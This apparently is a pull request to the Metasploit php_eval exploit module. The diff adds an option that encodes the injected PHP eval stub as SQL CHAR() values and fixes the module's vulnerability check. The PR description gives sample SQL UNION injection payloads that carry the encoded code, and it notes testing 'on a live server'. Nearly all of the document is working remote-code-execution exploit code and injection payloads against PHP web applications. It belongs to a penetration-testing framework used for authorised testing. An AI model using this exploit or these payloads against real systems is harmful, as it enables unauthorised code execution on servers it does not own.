### PR TITLE
Altered php_eval to have SQL Char wrapper option and corrected exploit check

### DIFF
--- a/modules/exploits/unix/webapp/php_eval.rb
+++ b/modules/exploits/unix/webapp/php_eval.rb
@@ -49,12 +49,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		register_options(
 			[
 				OptString.new('URIPATH',   [ true,  "The URI to request, with the eval()'d parameter changed to !CODE!", '/test.php?evalme=!CODE!']),
+				OptBool.new('SQL_CHAR_SUPPORT', [false, 'Wrap !CODE! in sql char()', false])
 			], self.class)
 
 	end
 
 	def check
-		uri = datastore['PHPURI'].gsub(/\?.*/, "")
+		uri = datastore['URIPATH'].gsub(/\?.*/, "")
 		print_status("Checking uri #{uri}")
 		response = send_request_raw({ 'uri' => uri})
 		if response.code == 200
@@ -71,6 +72,15 @@ class Metasploit3 < Msf::Exploit::Remote
 
 		headername = "X-" + Rex::Text.rand_text_alpha_upper(rand(10)+10)
 		stub = "error_reporting(0);eval($_SERVER[HTTP_#{headername.gsub("-", "_")}]);"
+
+
+		# SQL Char function
+		if datastore['SQL_CHAR_SUPPORT']
+			sql_char = "CHAR("
+			stub.each_byte {|c| sql_char << c.to_s+"," }
+			sql_char.gsub!(/\,$/, ")")
+			stub = sql_char
+		end
 
 		uri = datastore['URIPATH'].sub("!CODE!", Rex::Text.uri_encode(stub))
 		print_status("Sending request for: http#{ssl ? "s" : ""}://#{rhost}:#{rport}#{uri}")


### PR DESCRIPTION
-Fixed the check() datastore[uri path].

-In rare cases, SQL data can be eval'd.  In this case, a bool option to wrap the injection point in SQL char() has been appended.

_test.php?news=-1 UNION ALL SELECT 1,2,3--
*test.php?news=-1 UNION ALL SELECT 1,/_eval'd code/*,3--
*test.php?news=-1 UNION ALL SELECT 1,!CODE!,3--
*test.php?news=-1 UNION ALL SELECT 1,CHAR(41,41,...,41),3--

-tested and verified on live server
